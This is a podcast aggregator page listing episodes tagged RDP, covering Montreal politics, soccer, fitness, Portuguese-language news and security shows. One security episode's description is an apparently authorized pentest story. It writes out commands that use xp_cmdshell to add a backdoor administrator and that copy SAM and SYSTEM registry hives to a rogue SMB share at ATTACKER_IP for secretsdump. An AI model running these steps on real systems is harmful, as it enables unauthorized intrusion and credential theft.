Podcasts about RDP

  • 303PODCASTS
  • 2,535EPISODES
  • 19mAVG DURATION
  • 3DAILY NEW EPISODES
  • Sep 14, 2025LATEST

POPULARITY

20172018201920202021202220232024


Best podcasts about RDP

Show all podcasts related to rdp

Latest podcast episodes about RDP

Battered Herons
Inter Miami vs. Charlotte FC: Postgame Reaction

Battered Herons

Play Episode Listen Later Sep 14, 2025 77:49


We take a Loss in disappointing fashion again Charlotte FC. Is it time to panic?#MLS #InterMiamiCF #Messi #InterMiami

7 Minute Security
7MS #692: Tales of Pentest Pwnage – Part 76

7 Minute Security

Play Episode Listen Later Sep 12, 2025 32:45


Happy Friday! Today's another hot pile of pentest pwnage. To make it easy on myself I'm going to share the whole narrative that I wrote up for someone else: I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/. I relayed the DA account to a SQL box that BloodHound said had a “session” from another DA. One part I can't explain is the first relay got me a shell in the context of NT SERVICEMSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as NT AUTHORITYSYSTEM (!). The net command would let me add a new user, but BLOCK me trying to make that new user a local admin. However, a scheduled task did the trick: xp_cmdshell schtasks /create /tn "Maintenance" /tr "net local group administrators backdoor /add" /sc once /st 12:00 /ru SYSTEM /f and then xp_cmdshell schtasks /run /tn "Maintenance". Turns out a DA wasn't interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP in to the victim and create a shadow copy. That part went fine, but for the life of me I couldn't copy reg hives out of it – EDR was unhappy. In the end, the bizarre combo of things that did the trick was: Setup smbserver.py with username/password auth on my attacking box: smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!' From the victim system, I did an mklink to the shadow copy: mklink /d C:tempbackup ?GLOBALROOTDeviceHarddiskVolumeShadowCopy123 From command prompt on the victim system, I authenticated to my rogue share: net use ATTACKER_IPshare /user:toteslegit DontMindMeLOL! Then I did a copy command for the first hive: copy SYSTEM my.attackingipsys.test. EDR would kill this cmd.exe box IMMEDIATELY. However….the copy completed! I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but copy completed!!!111!!!!! Finishing move: secretsdump -sam sam.test -system sys.test LOCAL

Montreal Now with Aaron Rand & Natasha Hall
Mennie: Carney's Trumpmobile may not be out of gas, but there's some knocking under the hood

Montreal Now with Aaron Rand & Natasha Hall

Play Episode Listen Later Sep 5, 2025 11:12


Montreal Now with Aaron Rand & Natasha Hall
Mennie: Is delaying a return to the National Assembly a bad sign? (Spoiler: all the signs are bad)

Montreal Now with Aaron Rand & Natasha Hall

Play Episode Listen Later Sep 4, 2025 8:33


Montreal Now with Aaron Rand & Natasha Hall
Kiefer Sutherland talks counter-tariffs, future of Jack Bauer and Canadian whisky

Montreal Now with Aaron Rand & Natasha Hall

Play Episode Listen Later Sep 3, 2025 18:57


Montreal Now with Aaron Rand & Natasha Hall
Mennie: How can Legault's 'new' cabinet be anything other than an admission of failure?

Montreal Now with Aaron Rand & Natasha Hall

Play Episode Listen Later Sep 3, 2025 10:32


Montreal Now with Aaron Rand & Natasha Hall
Legal Corner: How to negotiate employment contracts when you don't have leverage

Montreal Now with Aaron Rand & Natasha Hall

Play Episode Listen Later Sep 3, 2025 8:47


Montreal Now with Aaron Rand & Natasha Hall
Mennie: 'I didn't know' will become a curse tomorrow for Legault and the CAQ

Montreal Now with Aaron Rand & Natasha Hall

Play Episode Listen Later Sep 2, 2025 10:57


The Red Delta Project Podcast
Be Your Own Coach: 3 Free Apps to Break the Fitness Rat Race

The Red Delta Project Podcast

Play Episode Listen Later Sep 1, 2025 55:56


Most people think progress comes from harder workouts. The truth? Progress comes from better feedback. In this Red Delta Project Podcast, i'll show you how to become your own coach using three free apps you already have: 1. Camera app – film a set to spot technical erosion and fix form fast. 2. Notes/Docs app – keep an adaptive training log to observe → assess → plan (Double-Tap Training ready). 3. Timer app – structure work/rest, regulate intensity, and boost productivity without counting reps.You'll learn how to stop running in circles, make smarter changes, and get more results with less wasted effort—all while staying true to the RDP philosophy: Be Fit. Live Free.

The Big Five Podcast
Labour vote slitting among federal political parties. Plus: A protest outside Quebec's National Assembly

The Big Five Podcast

Play Episode Listen Later Sep 1, 2025 29:51


Trudie Mason, in for Elias Makos, is joined by Paul Gott, Lead singer and guitarist for Montreal Punk Rock band the Ripcordz and a journalism professor at Concordia and Political analyst Karim Boulos on The Big 5. The Labour vote has split across different political parties… The NDP isn’t the only one supporting worker rights anymore. People are headed to the street today to call for a general election in Quebec. Quebecers are encouraging people to take up two jobs to deal with increased cost of living.

Montreal Now with Aaron Rand & Natasha Hall
Political Corner: It's obvious that there is some sort of cover-up.

Montreal Now with Aaron Rand & Natasha Hall

Play Episode Listen Later Sep 1, 2025 10:30


Montreal Now with Aaron Rand & Natasha Hall
If the biggest beef in the Montreal election is one side stealing the other's homework, we're all in deep trouble.

Montreal Now with Aaron Rand & Natasha Hall

Play Episode Listen Later Aug 29, 2025 10:47


Montreal Now with Aaron Rand & Natasha Hall
Political Corner: There are two sides to the equation of corruption.

Montreal Now with Aaron Rand & Natasha Hall

Play Episode Listen Later Aug 29, 2025 10:03


IT Privacy and Security Weekly update.
257.5 Deep Dive. The Super Intelligent IT Privacy and Security Weekly Update for the week ending August 26th 2025

IT Privacy and Security Weekly update.

Play Episode Listen Later Aug 28, 2025 19:04


Organizations today face escalating cyber risks spanning state-sponsored attacks, supply chain compromises, and malicious apps. ShinyHunters' breaches of Salesforce platforms (impacting Google and Farmers Insurance) show how social engineering—like voice phishing—can exploit trusted vendors. Meanwhile, Russian actors (FSB-linked “Static Tundra”) continue to leverage old flaws, such as a seven-year-old Cisco Smart Install bug, to infiltrate U.S. infrastructure. Malicious apps on Google Play (e.g., Joker, Anatsa) reached millions of downloads before removal, proving attackers' success in disguising malware. New technologies bring fresh vectors: Perplexity's Comet browser allowed prompt injection–driven account hijacking, while malicious RDP scanning campaigns exploit timing to maximize credential theft.Responses vary between safeguarding and asserting control. The FTC warns U.S. firms against weakening encryption or enabling censorship under foreign pressure, citing legal liability. By contrast, Russia mandates state-backed apps like MAX Messenger and RuStore, raising surveillance concerns. Microsoft, facing leaks from its bug-sharing program, restricted exploit code access to higher-risk countries. Open-source projects like LibreOffice gain traction as sovereignty tools—privacy-first, telemetry-free, and free of vendor lock-in.AI-powered wearables such as Halo X smart glasses blur lines between utility and surveillance. Their ability to “always listen” and transcribe conversations augments human memory but erodes expectations of privacy. The founders' history with facial recognition raises additional misuse concerns. As AI integrates directly into conversation and daily life, the risks of pervasive recording, ownership disputes, and surveillance intensify.Platforms like Bluesky are strained by conflicting global regulations. Mississippi's HB 1126 requires universal age verification, fines for violations, and parental consent for minors. Lacking resources for such infrastructure, Bluesky withdrew service from the state. This illustrates the tension between regulatory compliance, resource limits, and preserving open user access.AI adoption is now a competitive imperative. Coinbase pushes aggressive integration, requiring engineers to embrace tools like GitHub Copilot or face dismissal. With one-third of its code already AI-generated, Coinbase aims for 50% by quarter's end, supported by “AI Speed Runs” for knowledge-sharing. Yet, rapid adoption risks employee dissatisfaction and AI-generated security flaws, underscoring the need for strict controls alongside innovation.Breaches at Farmers Insurance (1.1M customers exposed) and Google via Salesforce illustrate the scale of third-party risk. Attackers exploit trusted platforms and human error, compromising data across multiple organizations at once. This shows security depends not only on internal defenses but on continuous vendor vetting and monitoring.Governments often demand access that undermines encryption, privacy, and transparency. The FTC warns that backdoors or secret concessions—such as the UK's (later retracted) request for Apple to weaken iCloud—violate user trust and U.S. law. Meanwhile, Russia's mandatory domestic apps exemplify sovereignty used for surveillance. Companies face a global tug-of-war between privacy, compliance, and open internet principles.Exploited legacy flaws prove that vulnerabilities never expire. Cisco's years-old Smart Install bug, still unpatched in many systems, allows surveillance of critical U.S. sectors. Persistent RDP scanning further highlights attackers' patience and scale. The lesson is clear: proactive patching, continuous updates, and rigorous audits are essential. Cybersecurity demands ongoing vigilance against both emerging and legacy threats.

Montreal Now with Aaron Rand & Natasha Hall
Here's everything you need to know about Montreal's roadwork projects this fall

Montreal Now with Aaron Rand & Natasha Hall

Play Episode Listen Later Aug 28, 2025 8:55


Montreal Now with Aaron Rand & Natasha Hall
Heurtel: There will eventually be a deal with the U.S. but it's going to hurt

Montreal Now with Aaron Rand & Natasha Hall

Play Episode Listen Later Aug 27, 2025 9:54


Paul's Security Weekly
Naughty RBG, Docker, RDP, SBOMS, Kullback-Leibler, Oneflip, Youtube, Josh Marpet... - SWN #506

Paul's Security Weekly

Play Episode Listen Later Aug 26, 2025 33:44


Naughty RBG, Docker, RDP, SBOMS, Kullback-Leibler, Oneflip, Youtube, Josh Marpet, and more on the Security Weekly News. Visit https://www.securityweekly.com/swn for all the latest episodes! Show Notes: https://securityweekly.com/swn-506

Paul's Security Weekly TV
Naughty RBG, Docker, RDP, SBOMS, Kullback-Leibler, Oneflip, Youtube, Josh Marpet... - SWN #506

Paul's Security Weekly TV

Play Episode Listen Later Aug 26, 2025 33:43


Naughty RBG, Docker, RDP, SBOMS, Kullback-Leibler, Oneflip, Youtube, Josh Marpet, and more on the Security Weekly News. Show Notes: https://securityweekly.com/swn-506

Hack Naked News (Audio)
Naughty RBG, Docker, RDP, SBOMS, Kullback-Leibler, Oneflip, Youtube, Josh Marpet... - SWN #506

Hack Naked News (Audio)

Play Episode Listen Later Aug 26, 2025 33:44


Naughty RBG, Docker, RDP, SBOMS, Kullback-Leibler, Oneflip, Youtube, Josh Marpet, and more on the Security Weekly News. Visit https://www.securityweekly.com/swn for all the latest episodes! Show Notes: https://securityweekly.com/swn-506

Hack Naked News (Video)
Naughty RBG, Docker, RDP, SBOMS, Kullback-Leibler, Oneflip, Youtube, Josh Marpet... - SWN #506

Hack Naked News (Video)

Play Episode Listen Later Aug 26, 2025 33:43


Naughty RBG, Docker, RDP, SBOMS, Kullback-Leibler, Oneflip, Youtube, Josh Marpet, and more on the Security Weekly News. Show Notes: https://securityweekly.com/swn-506

DW em Português para África | Deutsche Welle
25 de Agosto de 2025 - Jornal da Manhã

DW em Português para África | Deutsche Welle

Play Episode Listen Later Aug 25, 2025 20:00


Na Guiné-Bissau, Domingos Simões Pereira qualificou de muito mau a suspensão das emissões da RTP e RDP, e deposita a sua confiança nos jovens guineenses para lutar contra o estado atual do país. 12 anos depois, Angola voltou a vencer o Afrobasket e em casa. Os Estados Unidos da América estarão a usar o continente africano como uma zona de descarga para deixar migrantes ilegais?

DW em Português para África | Deutsche Welle
22 de Agosto de 2025 – Jornal da Noite

DW em Português para África | Deutsche Welle

Play Episode Listen Later Aug 22, 2025 20:00


Moçambique: Entrada de Venâncio Mondlane no diálogo nacional inclusivo é fundamental? Governo moçambicano trava partida de navio carregado com madeira para a China. Angola com greve à vista na imprensa pública? Guiné-Bissau: Governo continua sem dar explicação para a expulsão da RTP, RDP e Lusa.

DW em Português para África | Deutsche Welle
15 de Agosto de 2024 – Jornal da Noite

DW em Português para África | Deutsche Welle

Play Episode Listen Later Aug 15, 2025 19:55


Guiné-Bissau: Governo guineense determina a expulsão da Agência Lusa, da RDP e da RTP África do país. Moçambique: Ministério da Justiça aceita registo do partido ANAMOLA do ex-candidato presidencial Venâncio Mondlane. Presidentes dos Estados Unidos e da Rússia encontram-se no Alasca, para sondarem as possibilidades de se chegar ao fim da guerra na Ucrânia.

The Tech Blog Writer Podcast
3372: Rapid7 Breaks Down the Business of Ransomware

The Tech Blog Writer Podcast

Play Episode Listen Later Aug 5, 2025 30:56


In this episode of Tech Talks Daily, I caught up with Raj Samani, Chief Scientist at Rapid7, to unpack the rapidly evolving world of ransomware. Raj has been on the front lines of cybercrime response for years and has seen firsthand how these attacks have professionalized. Gone are the days of casual ransomware notes asking for a few hundred dollars. Today, these groups operate like fully formed businesses with help desks, R&D teams, and carefully designed extortion models. We talked about how ransomware has become a reputational risk issue more than just a technical one. Raj shared that CEOs are often more concerned about data being exfiltrated and leaked to the press than they are about systems being locked down. It's no longer just about recovering files. It's about trust, public perception, and the long tail of brand damage. One of the most revealing parts of our discussion was how these attacks typically unfold. Raj walked me through real-world scenarios where criminals have remained inside networks for months, even years, before launching their final payload. He also described how careful planning, coordinated strike days, and threat intelligence can disrupt an attacker's kill chain before irreversible damage is done. We explored the uncomfortable truth that many organizations still fall victim to basic attacks because of poor cyber hygiene. While the threat landscape is becoming more sophisticated with the use of zero-day vulnerabilities and social engineering, many breaches still happen through exposed RDP ports or convincing phishing attempts. Raj also offered candid insights into the ethics and complexities of ransomware negotiations, why outright banning payments may backfire, and what companies should do in the first few hours after discovering they've been hit. He made it clear that cybersecurity is no longer just an IT issue. It affects everything from supply chains to public services and daily life. Is your organization prepared for the moment when ransomware moves from IT's concern to the boardroom's crisis?

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Monday, July 14th, 2025: Web Honeypot Log Volume; Browser Extension Malware; RDP Forensics

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast

Play Episode Listen Later Jul 15, 2025 6:10


DShield Honeypot Log Volume Increase Within the last few months, there has been a dramatic increase in honeypot log volumes and how often these high volumes are seen. This has not just been from Jesse s residential honeypot, which has historically seen higher log volumes, but from all of the honeypots that Jesse runs. https://isc.sans.edu/diary/DShield+Honeypot+Log+Volume+Increase/32100 Google and Microsoft Trusted Them. 2.3 Million Users Installed Them. They Were Malware. Koi Security s investigation of a single verified color picker exposed a coordinated campaign of 18 malicious extensions that infected a massive 2.3 million users across Chrome and Edge. https://blog.koi.security/google-and-microsoft-trusted-them-2-3-million-users-installed-them-they-were-malware-fb4ed4f40ff5 RDP Forensics Comprehensive overview of Windows RDP Forensics https://medium.com/@mathias.fuchs/chasing-ghosts-over-rdp-lateral-movement-in-tiny-bitmaps-328d2babd8ec